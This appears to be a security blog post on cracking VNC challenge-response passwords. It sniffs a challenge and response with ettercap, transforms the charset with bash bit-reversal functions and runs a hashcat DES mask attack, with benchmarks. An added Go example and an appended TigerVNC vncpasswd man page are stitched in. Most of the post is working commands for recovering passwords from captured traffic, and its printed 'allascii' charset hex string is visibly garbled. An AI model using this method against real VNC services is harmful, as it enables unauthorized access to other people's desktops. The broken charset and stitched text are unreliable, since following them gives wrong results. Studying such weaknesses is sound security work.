We wanted to crack a VNC challenge response using hashcat but could not find a complete guide.
So we started looking into how the VNC challenge-response authentication works, and here is what we understood:
- The client initiates a connection with the server.
- The server sends a unique/random 16-byte challenge to the client.
- The client encrypts the challenge with DES (a single pass, no chaining), keyed with the entered password, and sends the result as the response.
- The server receives the response, performs the same encryption with the stored password and compares the results.
- The connection is established if they match.
For info:
It is also known that the DES algorithm accepts keys of 56 bits; since ASCII characters are 7 bits long, the key can be at most 8 characters long. If it is shorter, it is padded with zeros. This assumes the traditional VNC protocol with DES is used (some newer VNC implementations may have modified this).
The issue is that VNC doesn't use the password given by the user as is but performs a transformation first: the bits of each byte of the corresponding ASCII value are reversed.
Password : 12345678
ASCII values (HEX) : 31 32 33 34 35 36 37 38
Binary values : 00110001 00110010 00110011 ...
Binary reversed : 10001100 01001100 11001100 ...
Reversed (HEX) : 8c 4c cc 2c ac 6c ec 1c
So the actual key used for the DES encryption is 8c4ccc2cac6cec1c (12345678 in ASCII).
John the Ripper has implemented this transformation since version 1.9.0-Jumbo-1.
In order to crack VNC passwords with hashcat we implemented this transformation with a small bash function to create a modified charset of the ASCII characters:
toHexVNC(){
    local binrev2hex=""
    for ((i=0;i<${#1};i++)); do
        # one character -> 8-bit binary string -> bit order reversed
        ascii2binrev=$(printf '%s' "${1:$i:1}" | perl -lpe '$_=unpack("B*",$_)' | rev)
        # reversed binary string -> two hex digits, appended to the result
        binrev2hex+=$(printf '%02x' "$((2#$ascii2binrev))")
    done
    echo "$binrev2hex"
}
We are aware that this code could be optimized by using other conversion methods (e.g. a C++ program or a lookup table).
We can now crack it with hashcat using:
- attack mode 3 (mask attack)
- hash type 14000 (DES)
- hash format: <cipher>:<plaintext> (for VNC this means <response>:<challenge>, NOT <challenge>:<response>)
  --> the response and challenge need to be truncated to 8 bytes (no need to waste resources on the whole 16 bytes, and in any case hashcat accepts only 8 bytes of cipher/plaintext)
- the reversed charset together with the --hex-charset option
Note: it might be more interesting to generate a custom reversed charset using the function above, as the full DES charset of hashcat covers more than the 95 printable ASCII characters. See 'VNC_allascii.charset' below.
$ ettercap -Tq -r VNC.cap
ettercap 0.7.5.4 copyright 2001-2013 Ettercap Development Team
...
192.168.11.110-5901:$vnc$*a5d62a6cd58f41abe8785a4485811aac*248d3290ce533f028613f092f25834cf
...
$ cat toCrack.txt
248d3290ce533f02:a5d62a6cd58f41ab
$ cat VNC_allascii.charset (all 95 printable ASCII characters transformed for VNC)
8646c626a666e6169656d636b676f60e8e4ece2eae6eee1e9e5e8242c222a262e2129252d232b272f20a8a4aca2aaa6aea1a9a5a0c8c4ccc2cac6cec1c9c840224a4547ab4d4fabc7edabadebe5cdc3c7c3474fcf43a449414e46406043e
$ hashcat -a 3 -m 14000 toCrack.txt -1 VNC_allascii.charset ?1?1?1?1?1?1?1?1 --hex-charset
#Returns: 8c4ccc2cac6cec1c
The cracked password will be a hex value and will need to be reversed again to recover the password (in ASCII) with the following function:
toAscii(){
    local ascii=""
    for ((i=0;i<${#1};i+=2)); do
        # one hex byte -> 8-bit binary string -> bit order reversed
        hex2binary=$(perl -e "printf '%08b', 0x${1:$i:2}" | rev)
        # reversed binary string -> the original ASCII character
        ascii+=$(echo "$hex2binary" | perl -lpe '$_=pack("B*",$_)')
    done
    echo "$ascii"
}
Which will give the reversed password: 12345678
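The whole flow described above, as an added example that is not part of the original post: the password-to-key transformation and its inverse, the client's response computation and the server's check (DES-ECB over the two 8-byte halves of the challenge, using Go's standard crypto/des), and the conversion of an ettercap record into the hashcat -m 14000 input line. The function names and the 16-byte challenge used in main are our own constructed values; the ettercap record and the 12345678 -> 8c4ccc2cac6cec1c pair are taken from the text.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/subtle"
	"encoding/hex"
	"fmt"
	"math/bits"
	"strings"
)

// vncKey turns a VNC password into the 8-byte DES key the classic
// protocol really uses: bit order reversed in every byte, password
// truncated to 8 characters, shorter passwords zero-padded.
func vncKey(password string) []byte {
	key := make([]byte, 8)
	for i := 0; i < len(password) && i < 8; i++ {
		key[i] = bits.Reverse8(password[i])
	}
	return key
}

// vncKeyHex is the hex form hashcat reports (cf. the bash toHexVNC).
func vncKeyHex(password string) string {
	return hex.EncodeToString(vncKey(password))
}

// keyToPassword undoes vncKey on a cracked hex key (cf. the bash toAscii);
// trailing zero bytes are padding, not password characters.
func keyToPassword(hexKey string) (string, error) {
	key, err := hex.DecodeString(hexKey)
	if err != nil {
		return "", err
	}
	key = bytes.TrimRight(key, "\x00")
	out := make([]byte, len(key))
	for i, b := range key {
		out[i] = bits.Reverse8(b)
	}
	return string(out), nil
}

// vncResponse is the client side: DES-ECB encrypt the 16-byte challenge
// as two independent 8-byte blocks under the transformed key.
func vncResponse(challenge []byte, password string) ([]byte, error) {
	if len(challenge) != 16 {
		return nil, fmt.Errorf("challenge must be 16 bytes, got %d", len(challenge))
	}
	block, err := des.NewCipher(vncKey(password))
	if err != nil {
		return nil, err
	}
	resp := make([]byte, 16)
	block.Encrypt(resp[:8], challenge[:8])
	block.Encrypt(resp[8:], challenge[8:])
	return resp, nil
}

// serverVerify is the server side: recompute the response from the stored
// password and compare in constant time.
func serverVerify(challenge, response []byte, password string) bool {
	expected, err := vncResponse(challenge, password)
	if err != nil {
		return false
	}
	return subtle.ConstantTimeCompare(expected, response) == 1
}

// hashcatLine converts an ettercap "$vnc$*<challenge>*<response>" record
// into the hashcat -m 14000 line "<response[0:8]>:<challenge[0:8]>":
// cipher first, plaintext second, each truncated to 8 bytes (16 hex chars).
func hashcatLine(record string) (string, error) {
	idx := strings.Index(record, "$vnc$*")
	if idx < 0 {
		return "", fmt.Errorf("no $vnc$ marker in %q", record)
	}
	parts := strings.Split(record[idx+len("$vnc$*"):], "*")
	if len(parts) != 2 || len(parts[0]) != 32 || len(parts[1]) != 32 {
		return "", fmt.Errorf("malformed record %q", record)
	}
	challenge, response := parts[0], parts[1]
	return response[:16] + ":" + challenge[:16], nil
}

func main() {
	fmt.Println(vncKeyHex("12345678")) // 8c4ccc2cac6cec1c, as in the text
	// Constructed challenge (not from a capture), just to show both sides.
	challenge := []byte("0123456789abcdef")
	resp, _ := vncResponse(challenge, "12345678")
	fmt.Println(serverVerify(challenge, resp, "12345678"), serverVerify(challenge, resp, "wrong"))
	line, _ := hashcatLine("192.168.11.110-5901:$vnc$*a5d62a6cd58f41abe8785a4485811aac*248d3290ce533f028613f092f25834cf")
	fmt.Println(line) // 248d3290ce533f02:a5d62a6cd58f41ab
}
```

Because the two challenge halves are encrypted independently, a captured response gives hashcat a valid 8-byte known-plaintext pair from the first half alone, which is why the text truncates both values.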
Some benchmarks:
Using 2x NVIDIA Quadro P4000 8GB
8 characters long loweralphanumspace -> max. ~2min
8 characters long mixalphanum -> max. ~2.2hours
8 characters long mixalphanumspace -> max. ~2.5hours
8 characters long allascii -> max. ~3days
Hope you'll find this interesting and useful.
Please feel free to give us feedback, thank you.
A&J
NAME
vncpasswd − change the VNC password
SYNOPSIS
vncpasswd [passwd-file]
vncpasswd −f
DESCRIPTION
vncpasswd allows you to set the password used to access VNC desktops. Its default behavior is to prompt for a VNC password and then store an obfuscated version of this password to passwd-file (or to $HOME/.vnc/passwd if no password file is specified). The vncserver script runs vncpasswd the first time you start a VNC desktop, and it invokes Xvnc with the appropriate −rfbauth option. vncviewer can also be given a password file to use via the −passwd option.
The password must be at least six characters long (unless the −f command-line option is used, see below), and only the first eight characters are significant. Note that the stored password is not encrypted securely: anyone who has access to this file can trivially find out the plain-text password, so vncpasswd always sets appropriate permissions (read and write only by the owner). However, when accessing a VNC desktop, a challenge-response mechanism is used over the wire, making it hard for anyone to crack the password simply by snooping on the network.
OPTIONS
−f    Filter mode. Read a plain-text password from stdin and write an encrypted version to stdout. Note that in filter mode, short or even empty passwords will be silently accepted.
A view-only password must be separated from the normal password by a newline character.
FILES
$HOME/.vnc/passwd
Default location of the VNC password file.
SEE ALSO
vncviewer(1), Xvnc(1), vncconfig(1), vncsession(8)
https://www.tigervnc.org
AUTHORS
Tristan Richardson, RealVNC Ltd., Antoine Martin, D. R. Commander and others.
VNC was originally developed by the RealVNC team while at Olivetti Research Ltd / AT&T Laboratories Cambridge. TightVNC additions were implemented by Constantin Kaplinsky. Many other people have since participated in development, testing and support. This manual is part of the TigerVNC software suite.